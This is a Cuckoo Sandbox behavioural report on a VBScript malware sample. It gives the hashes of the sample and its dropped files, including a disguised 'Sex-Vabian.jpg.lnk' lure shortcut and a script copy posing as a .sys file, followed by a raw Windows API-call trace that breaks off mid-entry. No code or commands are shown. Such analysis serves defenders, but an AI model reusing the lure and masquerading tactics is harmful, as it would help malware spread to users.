| Category | Started On | Completed On | Duration | Cuckoo Version |
|---|---|---|---|---|
| FILE | 2018-02-06 16:41:21 | 2018-02-06 16:51:36 | 615 seconds | 1.2 |
| Machine | Label | Manager | Started On | Shutdown On |
|---|---|---|---|---|
| WindowsXPSP3 | WindowsXPSP3 | VirtualBox | 2018-02-06 16:41:22 | 2018-02-06 16:51:35 |
| File name | dboardman3_malware2.vbs |
|---|---|
| File size | 9420 bytes |
| File type | ASCII text, with CRLF line terminators |
| CRC32 | A4A8B5E2 |
| MD5 | 9a1c48b9bfe5d642335bcbb983095994 |
| SHA1 | 78ee69c2d76ea773f4edbfea51518df455142348 |
| SHA256 | f74f124fd033ffc9c6a969ca1286b8a04c6255297852e0ad29ad2effadbbcbb4 |
| SHA512 | cc74950902f5d84c5ba4c40cee261ce86c96e34fe2c2b0c1cd5cfc2aef8e656d92083cae802fb476de8418cb8c0e9ad166940aec7b7239e6e20d3d6cab7140a3 |
| Ssdeep | 96:FKxvJMJPuSmLKMZkFVomNgFqTQo7p1JwtYny3zhzTnGbDxvx0soARhx62EA56SCT:MxvJmrNFV1NdkoQfRlAEI6h4F93Y |
| PEiD | None matched |
| Yara | None matched |
| VirusTotal | File not found on VirusTotal |
| File name | payload.txt |
|---|---|
| File size | 386 bytes |
| File type | ASCII text, with CRLF line terminators |
| MD5 | bbd12496c5a5225ba6425c5d105c95af |
| SHA1 | 8d51c2e9c8b6461d14b9ee5af3793d8fac392b77 |
| SHA256 | 30f79b2ec539fa89ec667ba1ad501d504e2c9b3bfc70e4dbeb9d4a0729233fdb |
| SHA512 | caf31481ac840b9298187a871b34ca7100b5b1428a715a1d640038424525e7edf9ed8670db5bced9d8bd90040f23db20bb420df4c1fa7e27ba5e0fa48ba804b5 |
| Ssdeep | 12:d/7SWPusFYVm6XmndTNTkK/EG8YKoFhzyX:dDYYWe/EGHd4 |
| Yara | None matched |
| VirusTotal | Search for Analysis |
| File name | backup_vabian.sys |
|---|---|
| File size | 9420 bytes |
| File type | ASCII text, with CRLF line terminators |
| MD5 | 9a1c48b9bfe5d642335bcbb983095994 |
| SHA1 | 78ee69c2d76ea773f4edbfea51518df455142348 |
| SHA256 | f74f124fd033ffc9c6a969ca1286b8a04c6255297852e0ad29ad2effadbbcbb4 |
| SHA512 | cc74950902f5d84c5ba4c40cee261ce86c96e34fe2c2b0c1cd5cfc2aef8e656d92083cae802fb476de8418cb8c0e9ad166940aec7b7239e6e20d3d6cab7140a3 |
| Ssdeep | 96:FKxvJMJPuSmLKMZkFVomNgFqTQo7p1JwtYny3zhzTnGbDxvx0soARhx62EA56SCT:MxvJmrNFV1NdkoQfRlAEI6h4F93Y |
| Yara | None matched |
| VirusTotal | Search for Analysis |
| File name | Sex-Vabian.jpg.lnk |
|---|---|
| File size | 1340 bytes |
| File type | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=0, Archive, ctime=Wed Feb 7 06:40:26 2018, mtime=Wed Feb 7 06:40:26 2018, atime=Wed Feb 7 05:38:31 2018, length=9420, window=showminimized |
| MD5 | 00ab8d610aa638b1f0d2603f96b58336 |
| SHA1 | ee84fc4c4d85247da9aac589ce0f8136904feb5e |
| SHA256 | cc2e50933e810a8978e4a6030fbc666e8e7bf591ea46cc3a0a348e744930cc02 |
| SHA512 | 1e98afb6b1a4afc7dce2073a099dcb439f3e064af1b2f9800100c70bab7a19fe3c76be97d4bd7232720e33f505770ef06c56a504df371ff5d85e389ff7cb1e2b |
| Ssdeep | 24:8r1vWlAevedfYP2fyL1/9/x4o00LOdoO4XZ+nGrjmrR:857MPvfWos1GrjmrR |
| Yara | None matched |
| VirusTotal | Search for Analysis |
| File name | desktop.ini |
|---|---|
| File size | 77 bytes |
| File type | ASCII text, with CRLF line terminators |
| MD5 | b125cfb7bd2483585e3b8eee09cee807 |
| SHA1 | 6edd39ea5deeb6739b2955f00c4a2ab281405b00 |
| SHA256 | 4a9eeb14c959fa61180a377d5441839b46fd130fcac3b03ba205e4e6e0cca941 |
| SHA512 | 053d654ec370298d7e542a41787ffed62851d1fb05c128977b0316288952f7112461dc9633e61a36bd0fd4479aaf7e1dcc0528cf9ceeb9ed90f9b632ab046319 |
| Ssdeep | 3:zOc1pLA9uXZECcYAGQECcrEI9hAl3:zz1aYJEHYAJEHQ6hAB |
| Yara | None matched |
| VirusTotal | Search for Analysis |
registry filesystem process services network synchronization
| Timestamp | Thread | Function | Arguments | Status | Return | Repeated |
|---|---|---|---|---|---|---|
| 19:40:26,253 | 252 | LdrLoadDll |
Flags => 1309196 BaseAddress => 0x7c800000 FileName => kernel32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetUserDefaultUILanguage FunctionAddress => 0x7c813100 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | LdrGetDllHandle |
ModuleHandle => 0x00000000 FileName => C:\WINDOWS\system32\rpcss.dll |
FAILURE | 0xc0000135 | 1 time |
| 19:40:26,253 | 252 | DeviceIoControl |
DeviceHandle => 0x0000003c OutBuffer => \x18 \xb1}<F\xe0\x97\xa0\xfb\xa6\xc5 s\xbbz\xcfi@\xb5\xd0 \x03\xff\x81v\xb3\\xefT\xe2p1\xf0\x1cgkF\xffx\xb2\x1e\x0e\xcc\x1cY\x01\xcdY<\xd4\xf2\xa7h\x89\xba9\xca\x19\x0fC\xb2\xb3\xaa\xb0\x99\x9d\xf12\x7fs\x82\xf7\xc5\xdcB\xb7\x93\xc6\xb2g~\x93=\xf8\xea\\x9cR\xd9\xd8\x81\xd3)\x14\xa4E<\xe6\xa7N\xe6\xb8\xa5[\xe6\xc5\x16E\x02\xc4\xfe\x1e\xab\x01\x8db =J6\x1c\x02x\xd2`\x175\x19C\xf0Z\xc5-\x0b\xf1h\xee\x89\xc5A\x91T~v\xdc\x85!P\x00WOx%\xd9\xfctOB3\x99\x03\x86\xda\xacp\xda\xd5dW\x8a\x905\x10\x14\x03\xf5D\xdd)\x85\xae\xb0\xca<[\xd9\xfc\x00`<\x19\xd9\xf6\x7f\xc8t\x01EB\xa0\xe2.eg\xbd\x13\x02\x0b/\xb7\xfa\xce\x056\x93"C\xc1\xf4C\xb5\x12\xad\xe7\xb6\x03\x8dh\xb0(\xb2\xa7\x0c\B\x1fo\x1et\xce\xfe*W\x15A\x9apv\x13 e;\xd8vw IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xb5\xcb\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl |
DeviceHandle => 0x0000003c OutBuffer => \xf4\x06]UC\x80\xc4\xf5\xdf\xb5?(\x98\x91\xaf\x8d\x03\xd4n\xf8y\xdc/\x9f\xe2\x1a\x08\x05\x92\xc9\x8d\xfe\xfaGy\xb4Q\xf5\x15\x11\xf0\x0c\xf0j\xf3\x0f\x8dP\x89d"!\x10\x82zH\xa1\x12\xf2kA\xeb\xf2\xb8^I\xac3 \x96}a\x06fA2q\xe7t\x9e\x9f\xf4\x89\xb8\x8f\xb2?\xda\x0c\xf1S\xc2(, \x10\x8c3W;U\xbf\xe6\xee\xa25\xf5\xebR&\x0fH\xe66\x81O(H\xbb\xa8z\x8a\xef\x85\x9c\x10'\xf6QA\xf0\xe5h\xa59\x94\xce\xc9\xf6m\xb0\xd4\x03\xea\x01\xa7\x1b0}\x06-\x90\xfc\x86\xb5\xa23@\xa7\x93\x19\xb7o\xa8X\xfe#dS2\x97z\xa2\x98\x9e\xe1\xe3\xe6\x06U\x95\x8d\x98O`\x1c\xdb|\xdd\xe5\xf8\xa5\x98\x03yt\xf0\xf9\xd9l\xbf\xf5\xc8u\x9b\x1c\xdf\xff\xb0\x9c\x03gi+\xd5\xc9|v\xcb6\x02\xbb\xfe\xa9A\xab\x80\xbd\x04\xcc\x9e~1\x8e\xd8\xb4\x12*L\xf9o\x10\xd0\xacy|>\xc5bT! \x8c\xfa\x194 IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl |
DeviceHandle => 0x0000003c OutBuffer => \x12\xb9\xdd7\xfef9\x14\xcd\xac_;\x0269\x9d}\x05y\x9c\xa8\x94]I\xac\xaeQH\xc5[;\xa6\x87\xa1\xa1\x95\xd9W\x08\xa6\x06Q<\xd71\x8f\x8by\xc1Sz\xb96J\x8b~\xb7\xf5\xff\x95\x14\xd9\x80\x83\xc6\xae\xa1k\x89\x08\x0cS\x8b\x82\x9e\x0b\x03YC\xb6\x1f\xa7\x1b8F\xfec\xad\x15\x81\xd8\xcd\xf1\x89 \xfb/v\x18%\x90\xb0\xda\x15~_\xc1\xa8\x0e\x00\xf2\x10\xbb\x15\x84\xb6\xd7\xfb \x8e\x97\xcbN\x99 g\xcd\xac\x92 &\x10\xfbu\xc8\xb0#\xdb\xff\xd6^\xf7\xc6\xb1e>X\x92\x9d\xc47\x01\x16u\xaf\xf1\x85\\xb3\x1b\xadt\xcb\xbd\x9f\xec%_ \xf3\xe8O\xaf+T\x98\x0cR\x13\xcf\xa3.\x80\xb81\xe0s\xd5\xe3\xb2+\xf4\x97|H\xc1\xc4L\xf4r3Hf\x1f\xb3\x8c2\xfb\x8e\x88&(\xc6Yw\x8a\xcf\xa5 +\xf5~\xe5zW@> \xd7\x0e\xa0<\xed\xc0\xec \xf5Z\x94\xc6\xfceX\x08p\x89\xb9\x97\xcc+\x92\x1e\xc2-!H IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl |
DeviceHandle => 0x0000003c OutBuffer => ;\xfd\xd0`\xb3]\xbev\xb6oJ@<#'}\xa1\xc1\x16\xfc\x03\xac\x0c\x13\x83\x830}\xd6?\xc9V@\xba\xc45\x03\xd9\xd3\xa6\xbd\xef+*\x93\xcf\xf5]\xc6\xe593\xa7\x9f \xf9\xebc\xac\x8e~\x8b\xe9\xb3p\xbe_}\xc6\xf3\x04\xc9Ye9\xef^\xff\xb3#o\x82\xf6\x8b\x11\x84\x92\xc8\xfd\xed9\xdf.\x11a\x05V@\xf6$\xeb\x1d.\xf4\x02\x11\xef\xcd2N\x81#\x01V\xc5\x8f\x1f?\x19\x02\x1e\xd5|\x109V\x08u\xa1\x0b\xb6?sYm\xae\xc8Z\xff\x94\xa6&\x01\xcd=zm\x89\xf7\x1d\x93\xa2J\xb4K\xc0\xc0\x83)\xc1\x12\x18\xc6\xdb\x96{\\xbe\x81\xa8nh\xd76\xc6|\xeb\xa7F<\xed'W\xbaokY\xa6\xe0k+\x12\x9e\xa60\xcdG\x10\xd5}\xadR\x02&x\xedn/\xb8yP\xdf\x14\x1b}\x9a\\xd6\xb84'\x15\xeaO\xf7\x85\xb0\xe6\x90\xe7\xcd\xe0\xad\x8a\xcd\xfbJ\x19\xbb\x84$\xfe\x99\xcfx\x9c\xe6\xcb\xfea~\xdfz,0\xd4 IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl |
DeviceHandle => 0x0000003c OutBuffer => \x0b\xc7\x00\xb6\x10\x12\x15\xd4\xcb@\x9e\xba\xc2u\xeaUk\xb5sy\x92\x9e9\xad\xcf|\xfa\xacg;\xa1tj\xb8a\xe20\xf1\xf2g\xef(z\xda\x08 \xfcIQ\xc0\xba\x08\xcd\x8f\xa6;y\x9f\xfb\xe4.\xdcP\x14\xe4\x0c\xd5\xac\xc6|\xba\xc2Gmd+a\xf2\x97h\xf19\xbf\x87\x84}G\x89q9;0\x87&Z\xdd\x91\xc09hxF\xd5\xdd\xabL\x87\xd0\xb2\xca|\xf2\x06d\xfd D\xcf\xe7\x14\x07\x9b\xac\x88\x83\x027&\xbd\xfd\x1b\xf0H\xa9\x9e\xc8\xe1H0\x10\x1a\x95\x9d\xc7q\x88$H\x9c\xe7\xa2\x08\xad$C\xec>\xbb\x8d\xf1\xb8\xb9LC\x13\x87l\xb7\xb6\x8f\xd0/\x14\xa74\x93\x1co\xf7\xe4J\xca\xf1\xd8`\xcb\x92\x8a\x02\x1c[N$b#5W\xacCr\xe6^`\xab\x05\xe2\x13\xdfW\x93\xca^\xf6+\xd4\xca\xc8[\x07\x03\xf8\x8b\x10PQ\xa2\x8a \x98Q;\xdc\xaa\xe7B\x0b\x9cXJ\xcf\x81\x11\xc1dr\x1d\xb5\xf6e\x1a\x98\x06\xe3TM\x86 IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl |
DeviceHandle => 0x0000003c OutBuffer => \xcdV\xa6\x1fG?\xbb\xc6\x82A\xaf \x1d\xdeJ\x97Y#\xc3W\x05%\xf88K)\x86\x14\x7f\x05\xa7\xf1\xbdo?\x1c\xd5?'G\xc8\xac\xc7\x1e.\xca\x98md>yL\x9c\x05\xb8\xe4K>\x1eiD\x91\xe2fP\x990\xe5 \xb6\x86d0\x18#v \x02\xb7\x06\xf5\xa32\xc3\x14\x8d\x8c\x07q\xf4\x0f\xec\xf8\x0f\xa1\x9d\xfe\xfc |\x02\xb7h9\xb8r\x1d\xa9#\xcfU8?\x0e\x15,\xb2\xd2)~\xdbG\xc8\x9d\xdc\xbe\x95P&e7\x08\x82}\xec\xeb\xd7\x8b\xb2\xb3\xa2\xb8\x98\xc5\xd1\xef\xa3\x8d\xb4 \xe9\xcb\xfdb\xe4\xbafl\xb5>\xe2f[%\xa1\xa68t\xfe\xc8\x947K\xbd\x91\x9e\x01\xb2_\x80\xf9\x85Z\x0f\x96|\xb5\x08\x97Pb\xd5s\x19\x04)\xa3_>\xa5\xb7\x1b\x8d?h\x05\x98\x14s\xd3\xcd\x92\xdd\xf7Y\x02\x00\x84hBl\x0c\x80#oI\xc1s\x0e\x80\x8f\xa9\xed'\xb0\xa6@^."\xe3\x9c\x81_j\x02\x05\xcd\x16\xd2\xfc\xb1\xf9p IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl |
DeviceHandle => 0x0000003c OutBuffer => \xefg\x0b\x153 \x93\xbd\x8e\xe0\xd2\x17\xfb\xc1\x00\x88\xcf,`\xe9O}H\x14\x0c\x9f\x87\x18j\x8d6B' \xcc03\x120\xb9\x13_j!\xac\x1d\xd7\x89Pu\xc1\xd2C\x04\xf0\xaa\x1a\xebXf\x12R\xd8\xda\x1b\xefc\x17\xdeD\x7f~f\xc7\xfd\xac\xda\x84\xd1\xa3\x96\x85'_>\xa2@\xe6 So\x9bP)\x08\xa0\x9dE\xacs\x97\xed\x9d\x939S\xee\xe1"\xb6\xa1\x1a\x00\x81G\x9en\xb2\x02e\xaa\xa8\x1b\x97E\x92\xbd[\x90 !\x1dr<\xaf\x19Y`'\x9f\xe0\xf3b\xf4,\xba(\xb3\xd7\xe0r\xbbt\xce*\xf1\x804\xe83\x1d\xbb\x87\x89\x93\x00\xe5f\x9b\xe71!Z\x82@\xe3r\xc7r\xc1\xbeS$\x96\xde\xd1\!\xa3\xa8\x9c%\x14\x865\xb8\xf8\xd3\xee`\xf2Lf\x96\x87\xf7M\xabttx\x96S\xec1\x83\x1b\x9cp6\x92\xf0\xde!W\x02\x1ff\x1ds\xfc\xb1\xdcQ\xda&'b\xa9\xf4v\xba\xc1j\xc8\xe3E\x89K\xf0,T\xfeq\xeeR IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | LdrLoadDll |
Flags => 1308796 BaseAddress => 0x5ad70000 FileName => C:\WINDOWS\system32\uxtheme.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | IsDebuggerPresent | FAILURE | 0x00000000 | ||
| 19:40:26,253 | 252 | LdrLoadDll |
Flags => 1308616 BaseAddress => 0x5ad70000 FileName => uxtheme.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | |
| 19:40:26,253 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013f6b0 SectionHandle => 0x000000ac ProcessHandle => 0xffffffff BaseAddress => 0x00b00000 |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | 1 time |
| 19:40:26,253 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows Script Host\Settings |
FAILURE | 0x00000002 | |
| 19:40:26,253 | 252 | RegOpenKeyExW |
Handle => 0x000000b8 Registry => 0x80000002 SubKey => Software\Microsoft\Windows Script Host\Settings |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | RegQueryValueExW |
Handle => 0x000000b8 DataLength => 1024 ValueName => Enabled Type => 1306708 |
FAILURE | 0x00000002 | |
| 19:40:26,253 | 252 | LdrGetDllHandle |
ModuleHandle => 0x00000000 FileName => C:\WINDOWS\system32\winlogon.exe |
FAILURE | 0xc0000135 | 1 time |
| 19:40:26,253 | 252 | RegOpenKeyExW |
Handle => 0x000000c4 Registry => 0x80000002 SubKey => Software\Microsoft\Ole |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | RegQueryValueExW |
Handle => 0x000000c4 DataLength => 4 ValueName => MaximumAllowedAllocationSize Type => 1308492 |
FAILURE | 0x00000002 | |
| 19:40:26,253 | 252 | RegCloseKey |
Handle => 0x000000c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | LdrLoadDll |
Flags => 1308456 BaseAddress => 0x00b50000 FileName => xpsp2res.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x000000c4 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x000000cc ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtQueryValueKey |
Information => M\x00I\x00K\x00E\x00-\x00B\x00D\x000\x001\x009\x006\x00D\x000\x003\x009\x00\x00\x00 KeyHandle => 0x000000cc ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x000000d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile |
FileHandle => 0x000000d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtWriteFile |
